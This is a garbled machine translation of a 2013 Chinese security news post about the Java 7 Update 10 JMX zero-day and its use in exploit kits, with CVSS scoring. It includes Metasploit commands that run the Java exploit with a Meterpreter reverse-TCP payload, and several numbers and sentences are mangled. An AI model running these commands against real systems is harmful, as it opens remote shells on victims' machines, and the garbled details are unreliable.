The New Year initial, Java break first 0day-vulnerability warning-the black bar safety net

2013-01-1100:00:00

佚名

www.myhack58.com

10 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

0.975 High

EPSS

Percentile

100.0%

JSON

1 1: The 0 0 UPDATE: MSF has been updated related to penetration testing module

use exploit/windows/browser/ie_cbutton_uaf
use exploit/multi/browser/java_jre17_jmxbean set SRVHOST 192.168.178.26 set TARGET 1 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.178.26 exploit

sysinfo
getuid

More links and video:
<http://eromang.zataz.com/2013/01/10/java-applet-jmx-0day-remote-code-execution-metasploit-demo/>

The beginning of the year, people still immersed in the festive atmosphere, the Java and giving away to everyone a Hao Li, so you like joy, have a great year. Recently, Java and explosion a new 0day that may allow an attacker to access the Computer Management Permissions, Java 7 Update 1 0 or earlier in the presence of the vulnerability, the vulnerability can allow a remote, unauthenticated attacker on the victim system to execute arbitrary code, the vulnerability is first in the‘Malware Don’t Need Coffee’blog.

Currently the vulnerabilities in the network there are two EXP,respectively, sold price for 7 0 0 and $ 1 5 0 0 dollars, in August last year foundCVE-2 0 1 2-4 6 8 1vulnerabilities in using a similar approach, view address.

Two EXP used by hackers to spread malicious software, the famous foreign Black Kit BlackHole Exploit Kit and Cool Exploit Kit has been updated with the EXP.

BlackHole author Paunch yesterday in the network published, said in a BlackHole add the JAVA 0day is sent to the Software User The New Year welfare, the AlienVault Labsconfirm, the BlackHole tool used in EXP confirmed for Java latest vulnerability.

US-CERT also issued a[VU#6 2 5 6 1 7 warning](<http://www.kb.cert.org/vuls/id/625617> a). Untrusted Java applet by calling the setSecurityManager()function to elevate permissions, so in the absence of code signatures obtained in the case of full privileges and.

More intercepted the attack of the sample please see:

<http://malware.dontneedcoffee.com/2013/01/0-day-17u10-spotted-in-while-disable.html>

The vulnerability distribution is as follows:

Currently recommendations can only disable the browser Java plugin to guard against the vulnerability attack:

[1] [2] next